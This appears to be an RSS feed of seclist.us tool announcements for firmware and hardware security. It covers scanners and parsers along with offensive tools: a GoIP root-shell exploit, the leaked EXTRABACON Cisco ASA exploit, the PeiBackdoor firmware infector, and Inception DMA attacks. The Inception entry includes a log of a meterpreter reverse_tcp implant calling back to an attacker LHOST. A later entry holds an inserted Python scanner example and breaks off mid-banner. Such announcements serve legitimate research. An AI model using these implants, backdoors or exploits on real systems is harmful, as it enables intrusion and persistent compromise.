firmware – Security List Network™
http://seclist.us
Wed, 25 Apr 2018 22:10:46 +0000

TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerability.
http://seclist.us/trommel-sift-through-directories-of-files-to-identify-indicators-that-may-contain-vulnerability.html
Fri, 20 Oct 2017 01:09:09 +0000

TROMMEL – sifts through directories of files to identify indicators that may contain vulnerabilities.

TROMMEL identifies the following indicators related to:
– Secure Shell (SSH) key files
– Secure Socket Layer (SSL) key files
– Internet Protocol (IP) addresses
– Uniform Resource Locator (URL)
– email addresses
– shell scripts
– web server binaries
– configuration files
– database files
– specific binary files (e.g. Dropbear, BusyBox, etc.)
– shared object library files
– web application scripting variables, and
– Android application package (APK) file permissions.
TROMMEL has also integrated vFeed, which allows for further in-depth vulnerability analysis of identified indicators.

trommel

Dependencies:
+ Python-Magic https://pypi.python.org/pypi/python-magic
+ vFeed Database Community (free edition) https://vfeed.io/pricing/
The vFeed.db (The Correlated Vulnerability and Threat Database) is a detective and preventive security information repository used for gathering vulnerability and mitigation data from scattered internet sources into a unified database.

Notes
* TROMMEL has been tested using Python 2.7 on macOS Sierra and Kali Linux x86_64.
* TROMMEL was written with the intent to help identify indicators that may contain vulnerabilities found in the firmware of embedded devices.

Usage:

git clone https://github.com/CERTCC-Vulnerability-Analysis/trommel && cd trommel
./trommel.py --help
./trommel.py -p /directory -o output_file

Source: https://github.com/CERTCC-Vulnerability-Analysis

uefi firmware parser – Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc.
http://seclist.us/uefi-firmware-parser-parse-biosintel-meuefi-firmware-related-structures-volumes-filesystems-files-etc.html
Thu, 28 Sep 2017 15:15:18 +0000

The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials.

Features:
+ UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
+ Intel PCH Flash Descriptors
+ Intel ME modules parsing (ME, TXE, etc)
+ Dell PFS (HDR) updates parsing
+ Tiano/EFI, and native LZMA (7z) [de]compression
+ Complete UEFI Firmware volume object hierarchy display
+ Firmware descriptor [re]generation using the parsed input volumes
+ Firmware File Section injection

The UEFI firmware parser v1.7

Supported Vendors
This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse; some may require a priori decompression or extraction from the distribution update mechanism (typically a PE).
– ASRock
– Dell
– Gigabyte
– Intel
– Lenovo
– HP
– MSI
– VMware
– Apple

Requirements
– Python development headers, usually found in the python-dev package.
– The compression/decompression features will use the python headers and gcc.
– pefile is optional, and may be used for additional parsing.

Usage:

git clone https://github.com/theopolis/uefi-firmware-parser && cd uefi-firmware-parser
pip install -r requirements.txt
./bin/uefi-firmware-parser -h
./bin/uefi-firmware-parser --test <your_image_firmware>
python scripts/fv_injector.py -h
python scripts/uefi_guids.py -h

Install with pypi:
sudo pip install uefi_firmware
sudo pip install uefi_firmware --upgrade (for upgrade)

Source: https://github.com/theopolis

DblTekGoIPPwn – Tool to exploit the challenge response system in vulnerable DblTek GoIP devices.
http://seclist.us/dbltekgoippwn-tool-to-exploits-challenge-response-system-in-vulnerable-dbltek-goip-devices.html
Mon, 06 Mar 2017 07:59:54 +0000

DblTekGoIPPwn is a tool to exploit the challenge-response system in vulnerable DblTek GoIP devices. It can generate responses to specified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, and drop into a root shell on any vulnerable host.

The Vulnerability
+ On March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek GoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named ‘dbladm’. When a user entered this as their username in a telnet prompt, the system would present a challenge that when followed with the right response, gave the user a root shell on the system.
+ The problem with such a challenge-response system is that the devices are only as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be acquired on ANY DblTek GoIP device.

DblTekGoIPPwn

Linux Dependencies:
+ Mono
Windows Dependencies:
+ Visual Studio

Usage:

git clone https://github.com/JacobMisirian/DblTekGoIPPwn && cd DblTekGoIPPwn
./install.sh
DblTekGoIPPwn --help
DblTekGoIPPwn --send-commands cmds.txt --file list.txt --output results.txt

Source: https://github.com/JacobMisirian

mithören is an extensible platform for wireless peripheral keystroke sniffing for microcomputers.
http://seclist.us/mithoren-is-an-extensible-platform-for-wireless-peripheral-keystroke-sniffing-for-microcomputers.html
Sun, 20 Nov 2016 22:42:07 +0000

mithören is an extensible platform for wireless peripheral keystroke sniffing for microcomputers.
The purpose of this project is to provide simple, extensible, human-readable interfacing with wireless peripheral sniffing. By combining a suite of existing tools into a simple set of commands, this platform makes penetration testing and device reconnaissance compact.

Mithoren FrontEnd

Firmware and research tools for Nordic Semiconductor nRF24LU1+ based USB dongles and breakout boards.
Requirements
+ SDCC (minimum version 3.1.0)
+ GNU Binutils
+ Python
+ PyUSB
+ platformio

Supported Hardware
The following hardware has been tested and is known to work.
– CrazyRadio PA USB dongle
– SparkFun nRF24LU1+ breakout board
– Logitech Unifying dongle (model C-U0007, Nordic Semiconductor based)

Features:
+ Flash over USB
+ Flash a Logitech Unifying dongle
+ Flash a Logitech Unifying dongle back to the original firmware.
+ Flash over SPI using a Teensy
+ Flash the nRF24LU1+

Mithoren Tools

Installation
To utilize the full-system image:
* Flash image file under ‘image’ onto an SD-card or

For the standalone application:
* Copy ‘app’ into working directory
* Run ‘mithren.py’

Download and build from source on Debian/Ubuntu:

Install Dependencies:
sudo apt-get install sdcc binutils python python-pip
sudo pip install -U pip
sudo pip install -U -I pyusb
sudo pip install -U platformio

git clone https://github.com/wolfmd/mith-ren && cd mith-ren
cd modules/mousejack/
make
To flash the firmware over USB:
sudo make install

To flash the firmware over USB onto a Logitech Unifying dongle:
sudo make logitech_install

To flash the Logitech firmware onto the dongle:
sudo ./prog/usb-flasher/logitech-usb-restore.py [path-to-firmware.hex]

Build and Upload the Teensy Flasher
platformio run --project-dir teensy-flasher --target upload

Flash the nRF24LU1+
sudo make spi_install

For the reconnaissance tools:
cd tools and run them one by one

Finally:
cd ..
cd app
Run:
python mithren-frontend.py
python mithrend.py

Source: https://github.com/wolfmd

Toolkit to emulate firmware and analyse it for security vulnerabilities.
http://seclist.us/toolkit-to-emulate-firmware-and-analyse-it-for-security-vulnerabilities.html
Sat, 19 Nov 2016 06:44:05 +0000

FAT is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware. It was built to be used for the “Offensive IoT Exploitation” training conducted by Attify.

Note:
* As of now, it is simply a script to automate Firmadyne which is a tool used for firmware emulation. In case of any issues with the actual emulation, please post your issues in the firmadyne issues.
* In case you are on Kali and are facing issues with emulation, it is recommended to use the AttifyOS Pre-Release VM downloadable from here, or alternatively you could do the above mentioned.

Firmware Analysis Toolkit

Firmware Analysis Toolkit is built on top of the following existing tools and projects:
1. Firmadyne
2. Binwalk
3. Firmware-Mod-Kit
4. MITMproxy
5. Firmwalker

Download and Setup instructions:

Install Binwalk:

git clone https://github.com/devttys0/binwalk.git
cd binwalk
sudo ./deps.sh
sudo python ./setup.py install
sudo apt-get install python-lzma  # for Python 2.x
sudo -H pip install git+https://github.com/ahupp/python-magic

Setting up firmadyne:

sudo apt-get install busybox-static fakeroot git kpartx netcat-openbsd nmap python-psycopg2 python3-psycopg2 snmp uml-utilities util-linux vlan qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
git clone --recursive https://github.com/firmadyne/firmadyne.git
cd ./firmadyne; ./download.sh

Edit firmadyne.config and make the FIRMWARE_DIR point to the current location of Firmadyne folder.

Setting up FAT:

git clone https://github.com/attify/firmware-analysis-toolkit
mv firmware-analysis-toolkit/fat.py .
mv firmware-analysis-toolkit/reset.sh .
chmod +x fat.py
chmod +x reset.sh
vi fat.py
Here, edit line 9, which is firmadyne_path = '/root/tools/firmadyne', to the correct path on your system.

Setting up Firmware-mod-Kit:

sudo apt-get install git build-essential zlib1g-dev liblzma-dev python-magic
git clone https://github.com/brianpow/firmware-mod-kit.git
Find the location of binwalk using which binwalk. Modify the file shared-ng.inc to change the value of the variable BINWALK to /usr/local/bin/binwalk (if that is where your binwalk is installed).

Setting up MITMProxy:
pip install mitmproxy or apt-get install mitmproxy

Setting up Firmwalker:
git clone https://github.com/craigz28/firmwalker.git

python fat.py

Source: https://github.com/attify

CHIPSEC v1.2.5 – Platform Security Assessment Framework.
http://seclist.us/chipsec-v1-2-5-platform-security-assessment-framework.html
Sat, 05 Nov 2016 10:35:54 +0000

CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and the configuration of platform components. It includes a security test suite, security assessment tools for various low level components/interfaces, and basic forensic capabilities for firmware.
CHIPSEC can run from Windows, Linux, Mac OS X and UEFI Shell.

What is Platform Security?
Hardware Implementation and Configuration
• Available Security Features
• Correct Configuration of HW Components
• Testing/Demonstration of HW Security Mechanisms
Firmware Implementation and Configuration
• Access Controls on Firmware Interfaces
• Correct Settings of Lock Bits
• Testing/Demonstration of FW Security Mechanisms

chipsec v1.2.5

Features:
+ System Management Mode
* CPU SMM Cache Poisoning / SMM Range Registers (SMRR)
* SMM memory (SMRAM) Lock
+ BIOS Write Protection
+ Direct HW Access for Manual Testing
+ Forensics
* Live system firmware analysis
* Offline system firmware analysis

Latest Change chipsec v1.2.5:
* More generic handling of chipsec_tools
* file extension fix
* Installing chipsec-manual.pdf
* change setup.py build driver by default. change root directory of chipsec. move WARNING.txt to chipsec. remove PKG-INFO

Tested on:
• Fedora LXDE 64bit
• Ubuntu 64bit
• Debian 64bit and 32bit
• Linux UEFI Validation (LUV)

Installing Manually on Linux & Mac OSX Platform:

Clone chipsec Git repository and install it as a package:
git clone https://github.com/chipsec/chipsec && cd chipsec
python setup.py install
sudo chipsec_main
To use CHIPSEC in place without installing it:
python setup.py build_ext -i
sudo python chipsec_main.py

NOTE: Please read chipsec-manual.pdf for detailed installation and configuration instructions.

Source: https://github.com/chipsec

Cisco ASA SNMP Remote Code Execution Vulnerability (CVE-2016-6366).
http://seclist.us/cisco-asa-snmp-remote-code-execution-vulnerabilitycve-2016-6366.html
Sat, 24 Sep 2016 02:13:22 +0000

This is the public repository for improvements to the EXTRABACON v2 exploit, a remote code execution for Cisco ASA written by the Equation Group (NSA) and leaked by the Shadow Brokers.
This repository will be adding patches for most versions of 8.x and 9.x in the near future, after all versions have been tested on real hardware. There is improved shellcode, a LINA offset finder script, a Metasploit module, and extrabacon-2.0. It uses improved shellcode and has fewer stages than the Equation Group version, making it more reliable; this makes the SNMP payload packet ~150 bytes smaller. Also, the leaked version only supports 8.x; this one works on 9.x versions.

extrabacon v2

* Lina offset finder
– python2 ./lina-offsets.py asa_lina_XXX.elf

Will automatically generate necessary offsets to port the exploit to other versions of ASA.
Right now, it takes us longer to load a version of ASA firmware and test it, than it does to generate offsets for a specific version.

The only thing the script doesn’t calculate is FIX_EBP, which is usually 0x48 (72) or 0x58 (88). It seems like 8.4(1) and greater use 0x48.

Dependencies:
+ Metasploit Framework
+ Python 2.7.x
+ Python Scapy Modules
+ NASM

Use and Download:

sudo apt-get install nasm
(make sure you have the Metasploit Framework on your system)
git clone https://github.com/RiskSense-Ops/CVE-2016-6366 && cd CVE-2016-6366
nasm shellcode.nasm  # assemble the shellcode
Then you can run the offset finder:

python2 lina-offsets.py Your_asa_lina_XXX.elf

Source: https://github.com/RiskSense-Ops

HEATHEN – Internet Of Things Pentesting Framework.
http://seclist.us/heathen-internet-of-things-pentesting-framework.html
Thu, 15 Sep 2016 00:50:46 +0000

Heathen is an Internet of Things penetration testing framework developed as a research project, which automatically helps developers and manufacturers build more secure products in the Internet of Things space, based on the Open Web Application Security Project (OWASP), by providing a set of features in every fundamental area.

heathen

Main Menu:
* Insecure Web Interface
* Insufficient Authentication/Authorization
[-] Ensure that any access requiring authentication requires strong passwords
[-] Ensure that user roles can be properly segregated in multi-user environments
[-] Implement two-factor authentication where possible
[-] Ensure password recovery mechanisms are secure
[-] Ensure that users have the option to require strong passwords
[-] Ensure that users have the option to force password expiration after a specific period
[-] Ensure that users have the option to change the default username and password
* Insecure Network Services
* Lack of Transport Encryption
* Privacy Concerns
* Insecure Cloud Interface
* Insecure Mobile Interface
* Insufficient Security Configurability
* Insecure Software/Firmware
* Poor Physical Security
[-] Ensure the device is produced with a minimal number of physical external ports (e.g. USB ports)
[-] Ensure the firmware of Operating System can not be accessed via unintended methods such as through an unnecessary USB port
[-] Ensure the product is tamper resistant
[-] Ensure the product has the ability to limit administrative capabilities in some fashion, possibly by only connecting locally for admin functions
[-] Ensure the product has the ability to disable external ports such as USB

Usage and download:

git clone https://github.com/chihebchebbi/Internet-Of-Things-Pentesting-Framework.git heathen && cd heathen
bash Heathen.sh

Source: https://github.com/chihebchebbi

PEI stage backdoor for UEFI compatible firmware.
http://seclist.us/pei-stage-backdoor-for-uefi-compatible-firmware.html
Sun, 28 Aug 2016 10:41:40 +0000

This project implements an early stage firmware backdoor for UEFI based firmware. It allows arbitrary code written in C to be executed during the Pre EFI Init (PEI) phase of Platform Initialization (PI). This backdoor might be useful for low level manipulations of the target platform configuration at a point when most of the platform configuration registers are not yet locked.

PEI backdoor project includes:
+ PeiBackdoor.py – Python program that allows to infect raw flash images or individual UEFI PEI drivers with the backdoor code.
+ PeiBackdoor_IA32.efi, PeiBackdoor_IA32.pdb – 32-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = IA32.
+ PeiBackdoor_X64.efi, PeiBackdoor_X64.pdb – 64-bit PEI backdoor binary compiled with ACTIVE_PLATFORM = X64.
+ PeiBackdoor.inf – PEI backdoor project configuration for EDK2 build environment.
+ config.h – PEI backdoor build options.
+ payload.c – Put your own PEI stage code into this source file and call it from Payload() function.
+ src/ – Rest of the PEI backdoor code.
PeiBackdoor.py uses the Capstone engine and pefile Python libraries; you need to install them with the pip install capstone pefile command.

PeiBackdoor

PeiBackdoor.py program to deploy PEI backdoor

Possible applied use cases:
* Edit values of REMAPBASE, REMAPLIMIT and other host controller registers during RAM initialization to perform UMA remap attack on Intel Management Engine RAM.
* Lock TSEGMB host controller register with the junk value to make System Management Mode code vulnerable to DMA attacks.
* Do other evil things that require hijacking of early stage platform initialization code.

To build PeiBackdoor project you need to have a Windows machine with Visual Studio 2008 and EDK2 https://github.com/tianocore/edk2 source code.
Step by step instruction:
1. Run Visual Studio 2008 Command Prompt and cd to EDK2 directory.
2. Execute Edk2Setup.bat --pull command to configure build environment and download required binaries.
3. Execute git clone git://github.com/Cr4sh/PeiBackdoor.git command.
4. Edit Conf/target.txt file and set ACTIVE_PLATFORM property value to the OvmfPkg/OvmfPkgX64.dsc for 64-bit build or to the OvmfPkg/OvmfPkgIa32.dsc for 32-bit build. Also you need to set TARGET_ARCH property value to the X64 for 64-bit build or to the IA32 for 32-bit build.
5. Edit OvmfPkg/OvmfPkgX64.dsc and add PeiBackdoor/PeiBackdoor.inf path at the end of the [components] section.
6. cd PeiBackdoor && build
7. After compilation resulting PE image file will be created at Build/OvmfX64/DEBUG_VS2008x86/X64/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 64-bit build or at Build/OvmfX64/DEBUG_VS2008x86/IA32/PeiBackdoor/PeiBackdoor/OUTPUT/PeiBackdoor.efi for 32-bit build.

Running on real hardware
To run PeiBackdoor.efi on your physical machine you need to obtain an image of an existing PEI driver:
1. Dump motherboard firmware using hardware SPI programmer.
2. Open dumped flash image in UEFITool and extract PE/TE image of existing PEI driver that you want to infect with PEI backdoor:

pei-replace

...and infect it using PeiBackdoor.py:
1. Infect the extracted PE or TE image with SmmBackdoor_IA32.efi or SmmBackdoor_X64.efi depending on its architecture: python PeiBackdoor.py -d image.efi -o image_patched.efi -p PeiBackdoor_X64.efi
2. Use UEFITool to replace the original PE image with image_patched.efi, save the modified flash image into a file and write it to the motherboard ROM with the programmer.
Usage and Download from git:

git clone https://github.com/Cr4sh/PeiBackdoor && cd PeiBackdoor
python PeiBackdoor.py -f flash.bin -p PeiBackdoor_IA32.efi -o flash_patched.bin

Source: http://blog.cr4.sh/ | https://github.com/Cr4sh

Inception v0.4.1 is a physical memory manipulation and hacking tool exploiting PCI-based DMA.
http://seclist.us/inception-v0-4-1-is-a-physical-memory-manipulation-and-hacking-tool-exploiting-pci-based-dma.html
Wed, 29 Jun 2016 21:40:23 +0000

NOTICE: FOR SECURITY PROFESSIONALS, RESEARCHERS AND PENETRATION TEST RESEARCH

Roadmap & Changelog v0.4.1-git 29/6/2016:
+ Added some offsets for WIN7 Enterprise x64
Changelog 04/17/2015 v-0.4.1 Stable:
– Merged SLOTSCREAMER interface support

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

inception

How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.

Caveats
OS X > 10.7.2 and Windows > 8.1 disable FireWire DMA when the user has locked the OS and thus prevent inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-D, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.

Requirements

Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy firewire interfaces on OS X
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
— libforensic1394
— msgpack

Caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool looks for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, searching for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that don’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
  • If you have an OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Installation
On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

or

wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz -O - | tar xz
cd libforensic1394-0.2
cmake CMakeLists.txt
make install
cd python
python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.

General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:

incept [module name]

For a more complete and up-to-date description, run:

incept -h

Execution :

skygear$ incept implant --msfpw password --msfopts LHOST=36.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.1 (C) Carsten Maartmann-Moe 2016
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

For Source & More Detail read here : http://www.breaknenter.org/projects/inception/

Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.

Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)


Updates iv-wrt – An Intentionally Vulnerable Router Firmware Distribution.
http://seclist.us/updates-iv-wrt-an-intentionally-vulnerable-router-firmware-distribution.html
Mon, 10 Aug 2015 07:23:12 +0000

Latest Changelog: 9/8/2015:
– modified: exploits/auth_bypass.py
– modified: exploits/cmd_injection.py
– modified: exploits/csrf.py
– modified: iv-wrt.elf

iv-wrt is An intentionally vulnerable router firmware distribution based on OpenWrt.
Feature :
+ Authentication Bypass; Authentication bypass is turned off for the network diagnostics page.
+ Backdoor; A backdoor user account with root privileges has been added.
+ Command Injection; It is possible to inject ash commands into the ping field which exists on <ip-address>/admin/network/diagnostics.
+ Reflected Cross-Site Scripting; On /cgi-bin/luci/;stok=<session-token>/admin/system/packages you can search for a package to determine whether or not it’s installed. Your search string is shown above the results. It is possible to inject scripting into this field.
+ Stored Cross-Site Scripting; It is possible to inject scripting into the hostname of the router. Since the hostname appears in the title of every page in the administration interface, this results in stored XSS for all pages.
+ Cross Site Request Forgery; While a user is logged in to the administration interface, a specially-crafted link from an outside source can cause actions to be executed on the administration interface. The system does not verify that the session token is correct.

Setup :
To start the image you will need qemu-system-mipsel and all of its dependencies. We recommend that you create a TAP device called tap0 and bridge it to your network interface. When the image boots, its LAN ip will be 10.0.0.1.

The driver for e1000 network cards has been built into the image. The following command will tell qemu to start the image using the interface tap0 and the e1000:

qemu-system-mipsel -kernel iv-wrt.elf -nographic -m 256 -net tap,ifname=tap0,script=no,downscript=no -net nic,model=e1000

Download: iv-wrt-master.zip (7.43 MB)
Source: https://github.com/iv-wrt

Updates Inception v-0.4.1 is a physical memory manipulation and hacking tool exploiting PCI-based DMA.
http://seclist.us/updates-inception-v-0-4-1-is-a-physical-memory-manipulation-and-hacking-tool-exploiting-pci-based-dma.html
Fri, 17 Apr 2015 21:27:05 +0000

NOTICE: FOR SECURITY PROFESSIONALS, RESEARCHERS AND PENETRATION TEST RESEARCH

Changelog 04/17/2015 v-0.4.1:
– Merged SLOTSCREAMER interface support

Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe HW interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.

How it works:
– Inception’s modules work as follows: By presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE1394 FireWire interface, the victim operating system thinks that a SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4GB of RAM on the victim.
– Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
– After running that module you should be able to log into the victim machine using any password.
– An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
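The page-walk behind stages 1 and 2 above, as an added example that is not Inception's code: it scans a memory image page by page for a byte signature at a fixed in-page offset and reports the hit as absolute address plus page number, the way the execution log further down does (page_number reproduces those log values). The same walk is what a forensic triage of a memory dump does when hunting a known code pattern; the image, the wildcard signature format and the planted bytes are constructed.

```python
from typing import Optional, Sequence, Tuple

PAGE_SIZE = 0x1000           # 4 KiB pages; the tool's "page no." counts these
DMA_LIMIT = 0x100000000      # 32-bit DMA window: addresses >= 4 GiB are unreachable

# A signature is a byte sequence with None as a wildcard byte (constructed format).
Signature = Sequence[Optional[int]]

def matches_at(page: bytes, offset: int, sig: Signature) -> bool:
    """True if `sig` (wildcards allowed) occurs at `offset` inside `page`."""
    if offset + len(sig) > len(page):
        return False
    return all(b is None or page[offset + i] == b for i, b in enumerate(sig))

def page_number(address: int) -> int:
    """Page index the tool logs for an absolute physical address."""
    return address // PAGE_SIZE

def scan_image(image: bytes, sig: Signature, offset: int,
               start: int = 0) -> Optional[Tuple[int, int]]:
    """Walk whole pages from `start` up to the 4 GiB DMA limit and return
    (absolute address, page number) of the first page carrying `sig` at
    `offset`, or None when the signature is not within reach."""
    end = min(len(image), DMA_LIMIT)
    for base in range(start - start % PAGE_SIZE, end, PAGE_SIZE):
        if matches_at(image[base:base + PAGE_SIZE], offset, sig):
            return base + offset, page_number(base)
    return None

def build_demo_image() -> bytes:
    """Constructed 64 KiB image with a made-up pattern planted in page 9 at
    page offset 0x18c (the same in-page offset as the log line below)."""
    image = bytearray(16 * PAGE_SIZE)          # all zeroes
    hit = 9 * PAGE_SIZE + 0x18c
    image[hit:hit + 4] = b"\xaa\xbb\x42\xdd"
    return bytes(image)

DEMO_SIG: Signature = [0xAA, 0xBB, None, 0xDD]   # third byte is a wildcard

if __name__ == "__main__":
    hit = scan_image(build_demo_image(), DEMO_SIG, offset=0x18c)
    if hit:
        print("Signature found at 0x%x in page no. %d" % hit)
```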

Caveats
OS X > 10.7.2 and Windows > 8.1 disable FireWire DMA when the user has locked the OS and thus prevent inception. The tool will still work while a user is logged on. However, this is a less probable attack scenario IRL.
In addition, OS X Mavericks > 10.8.2 on Ivy Bridge (>= 2012 Macs) has VT-d enabled, effectively blocking DMA requests and thwarting all inception modules. Look for vtd[0] fault entries in your log/console.

Requirements

Inception requires:
Hardware:
— Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy FireWire interfaces on OS X.
— Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
Software:
— Python 3
— git
— gcc (incl. g++)
— cmake
— pip (for automatic resolution of dependencies)
— libforensic1394
— msgpack

Further caveats

  • Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool looks for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, searching for encryption keys.
  • You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that don’t map to hardware RAM.
  • OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
  • If you have an OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.

Key data:
Version: 0.4.0
License: GPL
Author: Carsten Maartmann-Moe (carsten@carmaa.com) AKA ntropy
Twitter: @breaknenter
Site: http://www.breaknenter.org/projects/inception
Source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under a LGPL license.

Installation
On Debian-based distributions the installation command lines can be summarized as:

sudo apt-get install git cmake g++ python3 python3-pip

On OS X, you can install the tool requirements with homebrew:

brew install git cmake python3

After installing the requirements, download and install libforensic1394:

git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install

Download and install Inception

git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install

The setup script should be able to install dependencies if you have pip installed.

General usage :
1. Connect the attacker machine (host) and the victim (target) with a FireWire cable
2. Run Inception
Simply type:

incept [module name]

For a more complete and up-to-date description, run:

incept -h

Execution :

0x0mar$ incept implant --msfpw password --msfopts LHOST=36.16.1.1

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
